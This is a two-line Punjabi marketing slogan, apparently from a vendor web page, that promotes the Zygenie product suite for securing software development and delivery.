ਆਪਣੇ ਸਾਫਟਵੇਅਰ ਵਿਕਾਸ ਅਤੇ ਡਿਲੀਵਰੀ ਨੂੰ ਸੁਰੱਖਿਅਤ ਕਰੋ

ਜ਼ਾਇਜੇਨੀ ਪ੍ਰੋਡਕਟ ਸੂਟ ਦੇ ਨਾਲ